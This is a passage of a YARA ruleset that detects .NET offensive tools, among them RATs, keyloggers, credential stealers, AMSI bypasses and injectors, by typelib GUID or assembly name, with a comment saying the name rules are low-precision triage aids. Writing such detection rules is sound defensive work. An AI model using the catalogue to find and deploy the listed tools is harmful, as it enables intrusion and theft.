HKTL_NET_GUID_Nuages { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/p3nt4/Nuages" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "e9e80ac7-4c13-45bd-9bde-ca89aadf1294" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpSniper { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/HunnicCyber/SharpSniper" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "c8bb840c-04ce-4b60-a734-faf15abf7b18" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpHound3 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/BloodHoundAD/SharpHound3" 
author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "a517a8de-5834-411d-abda-2d0e1766539c" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BlockEtw { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Soledge/BlockEtw" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "daedf7b3-8262-4892-adc4-425dd5f85bca" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpWifiGrabber { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/r3nhat/SharpWifiGrabber" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "c0997698-2b73-4982-b25b-d0578d1323c2" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpMapExec { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/cube0x0/SharpMapExec" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "bd5220f7-e1fb-41d2-91ec-e4c50c6e9b9f" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_k8fly { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/zzwlpx/k8fly" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "13b6c843-f3d4-4585-b4f3-e2672a47931e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Stealer { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/malwares/Stealer" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "8fcd4931-91a2-4e18-849b-70de34ab75df" ascii nocase wide $typelibguid1 = 
"e48811ca-8af8-4e73-85dd-2045b9cca73a" ascii nocase wide $typelibguid2 = "d3d8a1cc-e123-4905-b3de-374749122fcf" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PortTran { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/k8gege/PortTran" author = "Arnim Rupp" date = "2020-12-29" strings: $typelibguid0 = "3a074374-77e8-4312-8746-37f3cb00e82c" ascii nocase wide $typelibguid1 = "67a73bac-f59d-4227-9220-e20a2ef42782" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_gray_keylogger_2 { meta: description = "Detects VB.NET red/black-team tools via typelibguid" reference = "https://github.com/graysuit/gray-keylogger-2" author = "Arnim Rupp" date = "2020-12-30" strings: $typelibguid0 = "e94ca3ff-c0e5-4d1a-ad5e-f6ebbe365067" ascii nocase wide $typelibguid1 = "1ed07564-b411-4626-88e5-e1cd8ecd860a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Lime_Miner { meta: description = "Detects VB.NET red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Lime-Miner" author = "Arnim Rupp" date = "2020-12-30" strings: $typelibguid0 = "13958fb9-dfc1-4e2c-8a8d-a5e68abdbc66" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BlackNET { meta: description = "Detects VB.NET red/black-team tools via typelibguid" reference = "https://github.com/BlackHacker511/BlackNET" author = "Arnim Rupp" date = "2020-12-30" strings: $typelibguid0 = "c2b90883-abee-4cfa-af66-dfd93ec617a5" ascii nocase wide $typelibguid1 = "8bb6f5b4-e7c7-4554-afd1-48f368774837" ascii nocase wide $typelibguid2 = "983ae28c-91c3-4072-8cdf-698b2ff7a967" ascii nocase wide $typelibguid3 = "9ac18cdc-3711-4719-9cfb-5b5f2d51fd5a" ascii nocase wide 
condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PlasmaRAT { meta: description = "Detects VB.NET red/black-team tools via typelibguid" reference = "https://github.com/mwsrc/PlasmaRAT" author = "Arnim Rupp" date = "2020-12-30" strings: $typelibguid0 = "b8a2147c-074c-46e1-bb99-c8431a6546ce" ascii nocase wide $typelibguid1 = "0fcfde33-213f-4fb6-ac15-efb20393d4f3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Lime_RAT { meta: description = "Detects VB.NET red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Lime-RAT" author = "Arnim Rupp" date = "2020-12-30" strings: $typelibguid0 = "e58ac447-ab07-402a-9c96-95e284a76a8d" ascii nocase wide $typelibguid1 = "8fb35dab-73cd-4163-8868-c4dbcbdf0c17" ascii nocase wide $typelibguid2 = "37845f5b-35fe-4dce-bbec-2d07c7904fb0" ascii nocase wide $typelibguid3 = "83c453cf-0d29-4690-b9dc-567f20e63894" ascii nocase wide $typelibguid4 = "8b1f0a69-a930-42e3-9c13-7de0d04a4add" ascii nocase wide $typelibguid5 = "eaaeccf6-75d2-4616-b045-36eea09c8b28" ascii nocase wide $typelibguid6 = "5b2ec674-0aa4-4209-94df-b6c995ad59c4" ascii nocase wide $typelibguid7 = "e2cc7158-aee6-4463-95bf-fb5295e9e37a" ascii nocase wide $typelibguid8 = "d04ecf62-6da9-4308-804a-e789baa5cc38" ascii nocase wide $typelibguid9 = "8026261f-ac68-4ccf-97b2-3b55b7d6684d" ascii nocase wide $typelibguid10 = "212cdfac-51f1-4045-a5c0-6e638f89fce0" ascii nocase wide $typelibguid11 = "c1b608bb-7aed-488d-aa3b-0c96625d26c0" ascii nocase wide $typelibguid12 = "4c84e7ec-f197-4321-8862-d5d18783e2fe" ascii nocase wide $typelibguid13 = "3fc17adb-67d4-4a8d-8770-ecfd815f73ee" ascii nocase wide $typelibguid14 = "f1ab854b-6282-4bdf-8b8b-f2911a008948" ascii nocase wide $typelibguid15 = "aef6547e-3822-4f96-9708-bcf008129b2b" ascii nocase wide $typelibguid16 = "a336f517-bca9-465f-8ff8-2756cfd0cad9" ascii nocase wide 
$typelibguid17 = "5de018bd-941d-4a5d-bed5-fbdd111aba76" ascii nocase wide $typelibguid18 = "bbfac1f9-cd4f-4c44-af94-1130168494d0" ascii nocase wide $typelibguid19 = "1c79cea1-ebf3-494c-90a8-51691df41b86" ascii nocase wide $typelibguid20 = "927104e1-aa17-4167-817c-7673fe26d46e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_njRAT { meta: description = "Detects VB.NET red/black-team tools via typelibguid" reference = "https://github.com/mwsrc/njRAT" author = "Arnim Rupp" date = "2020-12-30" strings: $typelibguid0 = "5a542c1b-2d36-4c31-b039-26a88d3967da" ascii nocase wide $typelibguid1 = "6b07082a-9256-42c3-999a-665e9de49f33" ascii nocase wide $typelibguid2 = "c0a9a70f-63e8-42ca-965d-73a1bc903e62" ascii nocase wide $typelibguid3 = "70bd11de-7da1-4a89-b459-8daacc930c20" ascii nocase wide $typelibguid4 = "fc790ee5-163a-40f9-a1e2-9863c290ff8b" ascii nocase wide $typelibguid5 = "cb3c28b2-2a4f-4114-941c-ce929fec94d3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Manager { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/TheWover/Manager" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "dda73ee9-0f41-4c09-9cad-8215abd60b33" ascii nocase wide $typelibguid1 = "6a0f2422-d4d1-4b7e-84ad-56dc0fd2dfc5" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_neo_ConfuserEx { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/XenocodeRCE/neo-ConfuserEx" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "e98490bb-63e5-492d-b14e-304de928f81a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpAllowedToAct { meta: description = "Detects 
.NET red/black-team tools via typelibguid" reference = "https://github.com/pkb1s/SharpAllowedToAct" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "dac5448a-4ad1-490a-846a-18e4e3e0cf9a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SuperSQLInjectionV1 { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/shack2/SuperSQLInjectionV1" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "d5688068-fc89-467d-913f-037a785caca7" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ADSearch { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/tomcarver16/ADSearch" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "4da5f1b7-8936-4413-91f7-57d6e072b4a7" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_privilege_escalation_awesome_scripts_suite { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "1928358e-a64b-493f-a741-ae8e3d029374" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CVE_2020_1206_POC { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/ZecOps/CVE-2020-1206-POC" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "3523ca04-a12d-4b40-8837-1a1d28ef96de" ascii nocase wide $typelibguid1 = "d3a2f24a-ddc6-4548-9b3d-470e70dbcaab" ascii nocase wide $typelibguid2 = "fb30ee05-4a35-45f7-9a0a-829aec7e47d9" ascii nocase wide condition: (uint16(0) == 0x5A4D and 
uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DInvoke { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/TheWover/DInvoke" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "b77fdab5-207c-4cdb-b1aa-348505c54229" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpChisel { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/shantanu561993/SharpChisel" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "f5f21e2d-eb7e-4146-a7e1-371fd08d6762" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpScribbles { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/V1V1/SharpScribbles" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "aa61a166-31ef-429d-a971-ca654cd18c3b" ascii nocase wide $typelibguid1 = "0dc1b824-c6e7-4881-8788-35aecb34d227" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpReg { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/jnqpblc/SharpReg" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "8ef25b00-ed6a-4464-bdec-17281a4aa52f" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_MemeVM { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/TobitoFatitoRE/MemeVM" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "ef18f7f2-1f03-481c-98f9-4a18a2f12c11" ascii nocase wide $typelibguid1 = "77b2c83b-ca34-4738-9384-c52f0121647c" ascii nocase wide $typelibguid2 = 
"14d5d12e-9a32-4516-904e-df3393626317" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpDir { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/jnqpblc/SharpDir" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "c7a07532-12a3-4f6a-a342-161bb060b789" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AtYourService { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/mitchmoser/AtYourService" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "bc72386f-8b4c-44de-99b7-b06a8de3ce3f" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_LockLess { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/GhostPack/LockLess" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "a91421cb-7909-4383-ba43-c2992bbbac22" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_EasyNet { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/TheWover/EasyNet" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "3097d856-25c2-42c9-8d59-2cdad8e8ea12" ascii nocase wide $typelibguid1 = "ba33f716-91e0-4cf7-b9bd-b4d558f9a173" ascii nocase wide $typelibguid2 = "37d6dd3f-5457-4d8b-a2e1-c7b156b176e5" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpByeBear { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/S3cur3Th1sSh1t/SharpByeBear" author = "Arnim Rupp" date = "2021-01-21" strings: 
$typelibguid0 = "a6b84e35-2112-4df2-a31b-50fde4458c5e" ascii nocase wide $typelibguid1 = "3e82f538-6336-4fff-aeec-e774676205da" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpHide { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/outflanknl/SharpHide" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "443d8cbf-899c-4c22-b4f6-b7ac202d4e37" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpSvc { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/jnqpblc/SharpSvc" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "52856b03-5acd-45e0-828e-13ccb16942d1" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpCrashEventLog { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/slyd0g/SharpCrashEventLog" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "98cb495f-4d47-4722-b08f-cefab2282b18" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DotNetToJScript_LanguageModeBreakout { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/FuzzySecurity/DotNetToJScript-LanguageModeBreakout" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "deadb33f-fa94-41b5-813d-e72d8677a0cf" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharPermission { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/mitchmoser/SharPermission" author = "Arnim Rupp" date = "2021-01-21" 
strings: $typelibguid0 = "84d2b661-3267-49c8-9f51-8f72f21aea47" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_RegistryStrikesBack { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/mdsecactivebreach/RegistryStrikesBack" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "90ebd469-d780-4431-9bd8-014b00057665" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CloneVault { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/mdsecactivebreach/CloneVault" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "0a344f52-6780-4d10-9a4a-cb9439f9d3de" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_donut { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/TheWover/donut" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "98ca74c7-a074-434d-9772-75896e73ceaa" ascii nocase wide $typelibguid1 = "3c9a6b88-bed2-4ba8-964c-77ec29bf1846" ascii nocase wide $typelibguid2 = "4fcdf3a3-aeef-43ea-9297-0d3bde3bdad2" ascii nocase wide $typelibguid3 = "361c69f5-7885-4931-949a-b91eeab170e3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpHandler { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/jfmaes/SharpHandler" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "46e39aed-0cff-47c6-8a63-6826f147d7bd" ascii nocase wide $typelibguid1 = "11dc83c6-8186-4887-b228-9dc4fd281a23" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule 
HKTL_NET_GUID_Driver_Template { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/FuzzySecurity/Driver-Template" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "bdb79ad6-639f-4dc2-8b8a-cd9107da3d69" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_NashaVM { meta: description = "Detects .NET red/black-team tools via typelibguid" reference = "https://github.com/Mrakovic-ORG/NashaVM" author = "Arnim Rupp" date = "2021-01-21" strings: $typelibguid0 = "f9e63498-6e92-4afd-8c13-4f63a3d964c3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* NOTE(review): the HKTL_NET_NAME_* rules that follow are deliberately low-precision ("low hanging fruit"). Each one matches a bare project name (case-sensitive, not fullword, so it also hits as a substring of a longer name) plus "AssemblyTitle", a string carried by most .NET assemblies that declare assembly attributes; short or generic names such as "Aggressor", "ConfuserEx" (an open-source obfuscator also used by legitimate software) or "Infrastructure-Assessment" will therefore fire on unrelated binaries. Both these and the HKTL_NET_GUID_* rules above are defeated by a trivial rebuild that changes the assembly title or [assembly: Guid], and the header check only confirms an MZ/PE image, not a managed (CLR) one. Treat a hit as a hunting/triage pivot for manual review, not as a blocking or auto-conviction detection. A block comment is used here on purpose so the note cannot swallow the next rule if the file is ever collapsed onto one line. */ rule HKTL_NET_NAME_FakeFileMaker { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/DamonMohammadbagher/FakeFileMaker" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "FakeFileMaker" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_Aggressor { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/k8gege/Aggressor" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "Aggressor" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_pentestscripts { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/c4bbage/pentestscripts" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "pentestscripts" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 
0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_WMIPersistence { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/mdsecactivebreach/WMIPersistence" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "WMIPersistence" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_ADCollector { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/dev-2null/ADCollector" hash = "5391239f479c26e699b6f3a1d6a0a8aa1a0cf9a8" hash = "9dd0f322dd57b906da1e543c44e764954704abae" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "ADCollector" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_MaliciousClickOnceGenerator { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/Mr-Un1k0d3r/MaliciousClickOnceGenerator" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "MaliciousClickOnceGenerator" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_directInjectorPOC { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/badBounty/directInjectorPOC" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "directInjectorPOC" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_AsStrongAsFuck { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/Charterino/AsStrongAsFuck" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "AsStrongAsFuck" ascii wide $compile = "AssemblyTitle" ascii wide 
condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_MagentoScanner { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/soufianetahiri/MagentoScanner" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "MagentoScanner" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_RevengeRAT_Stub_CSsharp { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/NYAN-x-CAT/RevengeRAT-Stub-CSsharp" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "RevengeRAT-Stub-CSsharp" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_SharPyShell { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/antonioCoco/SharPyShell" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "SharPyShell" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_GhostLoader { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/TheWover/GhostLoader" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "GhostLoader" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_DotNetInject { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/dtrizna/DotNetInject" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "DotNetInject" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_ATPMiniDump 
{ meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/b4rtik/ATPMiniDump" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "ATPMiniDump" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_ConfuserEx { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/yck1509/ConfuserEx" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "ConfuserEx" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_SharpBuster { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/passthehashbrowns/SharpBuster" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "SharpBuster" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_AmsiBypass { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/0xB455/AmsiBypass" hash = "8fa4ba512b34a898c4564a8eac254b6a786d195b" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "AmsiBypass" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_Recon_AD { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/outflanknl/Recon-AD" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "Recon-AD" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_SharpWatchdogs { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/RITRedteam/SharpWatchdogs" author = 
"Arnim Rupp" date = "2021-01-22" strings: $name = "SharpWatchdogs" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_SharpCat { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/Cn33liz/SharpCat" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "SharpCat" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_aspnetcore_bypassing_authentication { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/jackowild/aspnetcore-bypassing-authentication" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "aspnetcore-bypassing-authentication" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_K8tools { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/k8gege/K8tools" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "K8tools" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_HTTPSBeaconShell { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/limbenjamin/HTTPSBeaconShell" author = "Arnim Rupp" date = "2021-01-22" strings: $name = "HTTPSBeaconShell" ascii wide $compile = "AssemblyTitle" ascii wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule HKTL_NET_NAME_Ghostpack_CompiledBinaries { meta: description = "Detects .NET red/black-team tools via name" reference = "https://github.com/r3motecontrol/Ghostpack-CompiledBinaries" author = "Arnim Rupp" date = "2021-01-22" strings: $name = 
